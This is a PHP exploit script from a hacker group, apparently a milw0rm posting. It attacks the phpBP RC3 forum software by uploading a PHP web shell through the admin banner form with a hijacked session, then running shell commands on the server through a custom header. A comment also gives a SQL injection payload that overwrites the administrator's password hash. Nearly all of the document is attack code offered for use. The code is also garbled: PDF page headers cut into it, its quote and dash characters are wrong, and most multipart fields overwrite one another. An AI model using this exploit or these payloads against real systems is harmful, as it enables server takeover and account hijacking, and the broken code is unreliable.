  1    <?
  2    //**************************************************************
  3    //Kacper & str0ke Settings
  4    $exploit_name = "phpBP <= RC3 (2.204) (sql/cmd) Remote Code Execution Exploit";
  5    $script_name = "phpBP RC3 (2.204)";
  6    $script_site = "http://www.phpbp.com/";
  7    $dork = ’Silnik strony jest chroniony prawami autorskimi PHP BP Team’;
  8    //to work exploit you need admin session
  9    //**************************************************************
  10   print ’
  11   ::::::::: :::::::::: ::: ::: ::::::::::: :::
  12   :+: :+: :+:            :+: :+: :+: :+:
  13   +:+ +:+ +:+              +:+ +:+ +:+ +:+
  14   +#+ +:+ +#++:++# +#+ +:+ +#+ +#+
  15   +#+ +#+ +#+                 +#+ +#+          +#+ +#+
  16   #+# #+# #+#                 #+#+#+#          #+# #+#
  17   ######### ########## ### ########### ##########
  18   ::::::::::: :::::::::: ::: :::: ::::
  19       :+: :+:             :+: :+: +:+:+: :+:+:+
  20       +:+ +:+              +:+ +:+ +:+ +:+:+ +:+
  21       +#+ +#++:++# +#++:++#++: +#+ +:+ +#+
  22       +#+ +#+              +#+ +#+ +#+             +#+
  23       #+# #+#              #+# #+# #+#            #+#
  24       ### ########## ### ### ###                     ###
  25
  26     − − [DEVIL TEAM THE BEST POLISH TEAM] − −
  27
  28
  29   [Exploit name: ’.$exploit_name.’
  30   [Script name: ’.$script_name.’
  31   [Script site: ’.$script_site.’
  32   dork: ’.$dork.’
  33
  34   Find by: Kacper (a.k.a Rahim)
  35   Blog: http://kacper.bblog.pl/
  36
  37   DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam
  38   DEVIL TEAM HOME: http://www.rahim.webd.pl/
  39
  40   Contact: kacper1964@yahoo.pl
  41
  42   (c)od3d by Kacper
  43   −=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−
  44   Greetings DragonHeart and all DEVIL TEAM Patriots :)
  45   − Leito & Leon | friend str0ke ;)
  46
  47   pepi, D0han, d3m0n, D3m0n (ziom z Niemiec :P)
  48   dn0de, DUREK5, fdj, konsol, mass, michalind, mIvus, nukedclx, QunZ,
  49   RebeL, SkD, Adam, drzewko, Leito, LEON, TomZen, dub1osu, ghost, WRB
  50
  51   and
  52

Kacper                                                                                   01/18/2007
                          phpBP RC3 2.204 sqlcmd Remote Code Execution Exploit                                     Page 2/5
  53    Dr Max Virus
  54    TamTurk,
  55    hackersecurity.org
  56    and all exploit publishers
  57    −=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−
  58              Greetings for 4ll Fusi0n Group members ;−)
  59              and all members of hacker.com.pl ;)
  60    −=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−
  61
  62         Kacper Hacking & Security Blog: http://kacper.bblog.pl/
  63    ’;
/*
How it works: a PHP file is uploaded through the admin "add banner" form
(index.php?module=admin&action=banners&cmd=add). The server stores it under a
generated name that keeps the .php extension, so it is then reachable under
upload/banners/ and executes whatever command arrives in the HAURU request
header. A valid admin session is required, so this is post-authentication
code execution.

Separately, the author reports SQL injection in the forum comment field:
posting the line below as a comment closes the string and appends an UPDATE
that replaces the password hash (and clears the buddy/subscription columns)
of the user with id 1. The hash is the author's own value; nothing here says
which password it corresponds to.
*/
//fajny';UPDATE/**/`22_users`/**/SET/**/`pass`/**/=/**/'6a8f25e5b30777a0435c22fe36f45e3c',`buddies`/**/=/**/NULL,`forum_subscribed`/**/=/**/NULL,`forum_subscribed_clicked`/**/=/**/NULL,`forum_unsubscribe`/**/=/**/NULL/**/WHERE/**/`id`/**/=/**/'1'/**/LIMIT/**/1;
/*
i.e. arbitrary SQL can be appended after the closing quote. Note that the
payload above relies on the application executing a second statement after
the ";" (a stacked query), which PHP's classic mysql_query() refuses; whether
the target's database layer allows it is not shown here.
*/
  73    if ($argc<5) {
  74    print_r(’
  75    −=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−
  76    Usage: php ’.$argv[0].’ host path admin_session cmd OPTIONS
  77    host:    target server (ip/hostname)
  78    path:     phpBP Forum path
  79    admin_session: admin session id
  80    cmd:       a shell command (ls −la)
  81    Options:
  82     −p[port]: specify a port other than 80
  83     −P[ip:port]: specify a proxy
  84    Example:
  85    php ’.$argv[0].’ 2.2.2.2 /phpBP/ d6c6cae3dfea20a0a5358fc9baff47be ls −la −P1.1.1.1:80
  86    php ’.$argv[0].’ 2.2.2.2 /phpBP/ d6c6cae3dfea20a0a5358fc9baff47be ls −la
  87    −=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−=−
  88    ’);
  89    die;
  90    }
  91    error_reporting(0);
  92    ini_set("max_execution_time",0);
  93    ini_set("default_socket_timeout",5);
  94    function quick_dump($string)
  95    {
  96       $result=’’;$exa=’’;$cont=0;
  97       for ($i=0; $i<=strlen($string)−1; $i++)
  98       {
  99         if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
  100        {$result.=" .";}
Kacper                                                                                                              01/18/2007
                          phpBP RC3 2.204 sqlcmd Remote Code Execution Exploit                     Page 3/5
  101        else
  102        {$result.=" ".$string[$i];}
  103        if (strlen(dechex(ord($string[$i])))==2)
  104        {$exa.=" ".dechex(ord($string[$i]));}
  105        else
  106        {$exa.=" 0".dechex(ord($string[$i]));}
  107        $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  108      }
  109     return $exa."\r\n".$result;
  110   }
  111   $proxy_regex = ’(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)’;
  112   function sendpacket($packet)
  113   {
  114      global $proxy, $host, $port, $html, $proxy_regex;
  115      if ($proxy==’’) {
  116         $ock=fsockopen(gethostbyname($host),$port);
  117         if (!$ock) {
  118           echo ’No response from ’.$host.’:’.$port; die;
  119         }
  120      }
  121      else {
  122              $c = preg_match($proxy_regex,$proxy);
  123         if (!$c) {
  124           echo ’Not a valid proxy...’;die;
  125         }
  126         $parts=explode(’:’,$proxy);
  127         echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
  128         $ock=fsockopen($parts[0],$parts[1]);
  129         if (!$ock) {
  130           echo ’No response from proxy...’;die;
  131              }
  132      }
  133      fputs($ock,$packet);
  134      if ($proxy==’’) {
  135         $html=’’;
  136         while (!feof($ock)) {
  137           $html.=fgets($ock);
  138         }
  139      }
  140      else {
  141         $html=’’;
  142         while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
  143           $html.=fread($ock,1);
  144         }
  145      }
  146      fclose($ock);
  147   }
  148   function make_seed()
  149   {
  150       list($usec, $sec) = explode(’ ’, microtime());
  151       return (float) $sec + ((float) $usec * 100000);
  152   }
  153   $host=$argv[1];
  154   $path=$argv[2];
  155   $adsess=$argv[3];
  156   $cmd="";
  157   $port=80;
  158   $proxy="";
  159   for ($i=4; $i<$argc; $i++){
  160   $temp=$argv[$i][0].$argv[$i][1];
  161   if (($temp<>"−p") and ($temp<>"−P")) {$cmd.=" ".$argv[$i];}
  162   if ($temp=="−p")
  163   {
  164      $port=str_replace("−p","",$argv[$i]);
  165   }
  166   if ($temp=="−P")
  167   {
  168      $proxy=str_replace("−P","",$argv[$i]);
  169   }
  170   }
  171   if ($proxy==’’) {$p=$path;} else {$p=’http://’.$host.’:’.$port.$path;}
  172   echo "Connected...\n";
  173   $data ="−−H4ck\r\n";
  174   $data.="Content−Disposition: form−data; name=\"url\";\r\n\r\n";
  175   $data.="http://kacper.bblog.pl/\r\n";
  176   $data ="−−H4ck\r\n";
  177   $data.="Content−Disposition: form−data; name=\"limit\";\r\n\r\n";
  178   $data.="0\r\n";
  179   $data ="−−H4ck\r\n";
  180   $data.="Content−Disposition: form−data; name=\"image\";\r\n\r\n";
  181   $data.="1\r\n";
  182   $data ="−−H4ck\r\n";
  183   $data.="Content−Disposition: form−data; name=\"form\";\r\n\r\n";
  184   $data.="1\r\n";
  185   $data ="−−H4ck\r\n";
  186   $data.="Content−Disposition: form−data; name=\"image_form\" filename=\"d.jpg.vil.gif.php\";\r\n\r\n";
  187   $data.="Content−Type: text/plain\r\n";
  188   $data.="Content−Transfer−Encoding: binary\r\n";
  189   $data.=’<?php ob_clean();//Ruchomy zamek Hauru ;−)echo"...Hacker..Kacper..Made..in..Poland!!...DEVIL.TEAM..the..best..polish..team..Greetz...";echo"...Go To DEVIL
        TEAM IRC: irc.milw0rm.com:6667 #devilteam";echo"...DEVIL TEAM SITE: http://www.rahim.webd.pl/";ini_set("max_execution_time",0);echo "Hauru";passthru($_SER
        VER[HTTP_HAURU]);die;?>\r\n’;
  190   $data ="−−H4ck\r\n";
  191   $data.="Content−Disposition: form−data; name=\"image_http\";\r\n\r\n";
  192   $data.="http://\r\n";
  193   $data ="−−H4ck\r\n";
  194   $data.="Content−Disposition: form−data; name=\"swf\";\r\n\r\n";
  195   $data.="0\r\n";
  196   $data ="−−H4ck\r\n";
  197   $data.="Content−Disposition: form−data; name=\"alt\";\r\n\r\n";
  198   $data.="0\r\n";
  199   $data ="−−H4ck\r\n";
  200   $data.="Content−Disposition: form−data; name=\"submit\";\r\n\r\n";
  201   $data.="Add\r\n";
  202   $data.="−−H4ck−−\r\n";
  203   echo "wait now insert evil code...\n";
  204   $packet ="POST ".$p."index.php?module=admin&action=banners&cmd=add HTTP/1.0\r\n";
  205   $packet.="Cookie: phpBP2=".$adsess.";\r\n";
  206   $packet.="Content−Type: multipart/form−data; boundary=−−H4ck\r\n";
  207   $packet.="Host: ".$host."\r\n";
  208   $packet.="Content−Length: ".strlen($data)."\r\n";
  209   $packet.="Connection: Close\r\n\r\n";
  210   $packet.=$data;
  211   sendpacket($packet);
  212   $packet ="GET ".$p."index.php?module=admin&action=banners HTTP/1.0\r\n";
  213   $packet.="Cookie: phpBP2=".$adsess.";\r\n";
  214   $packet.="Host: ".$host."\r\n";
  215   $packet.="Connection: Close\r\n\r\n";
  216   sendpacket($packet);
  217   $temp=explode(’<TD CLASS="row_1" ALIGN="CENTER"><A HREF="upload/banners/’,$html);
  218   $temp2=explode(’.php" TARGET="_blank">’,$temp[1]);
  219   $uploadid=trim($temp2[0]);
  220   if ($uploadid) {echo "Step 1\n";
  221   echo "Upload id: ".$uploadid."\n";
  222   $packet ="GET ".$p."upload/banners/".$uploadid.".php HTTP/1.0\r\n";
  223   $packet.="HAURU: ".$cmd."\r\n";
  224   $packet.="Host: ".$host."\r\n";
  225   $packet.="Connection: Close\r\n\r\n";
  226   $packet.=$data;
  227   sendpacket($packet);
  228   sleep(1);
  229   }else {
  230   echo "exploit failed... can’t upload script :/\n";
  231   echo "Go to DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam\r\n";
  232   die("\n\nClose Connection");
  233   }
  234   if (strstr($html,"Hauru"))
  235   {
  236   $temp=explode("Hauru",$html);
  237   die($temp[1]);
  238   }
  239   ?>
  240
  241   # milw0rm.com [2007−01−18]



